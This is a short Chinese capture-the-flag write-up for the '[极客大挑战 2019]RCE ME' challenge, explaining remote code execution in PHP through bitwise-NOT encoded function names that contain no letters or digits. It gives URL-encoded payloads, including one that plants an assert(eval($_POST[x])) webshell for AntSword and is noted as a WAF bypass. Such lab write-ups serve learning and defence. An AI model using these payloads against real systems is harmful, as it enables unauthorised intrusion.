[极客大挑战 2019]RCE ME
1 | <?php |
这道题就是通过取反构造无数字字母rce的
其实这种构造奇淫rce的 明白原理之后 直接当个脚本小子做起题来嘎嘎快
生成脚本如下:
1 | <?php |
直接构造system('ls')
发现不可以
就很奇怪 构造phpinfo()
找不到思路就去看看配置文件 这个真的很重要
payload:?code=(~%8F%97%8F%96%91%99%90)();
发现原来是好多函数被禁了 难怪执行不了
构造assert(eval($_POST[x]))
生成一句话木马用蚁剑去连接
注意这种eval()中再嵌套一个assert(eval())的方式 有时候可以绕过waf
payload: ?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%87%A2%D6);
接下来的思路就是怎么绕过disble_function 具体方式可以看我这一篇文章 这里就不赘述了 https://z1d10t.github.io/post/db3afe26.html?highlight=disable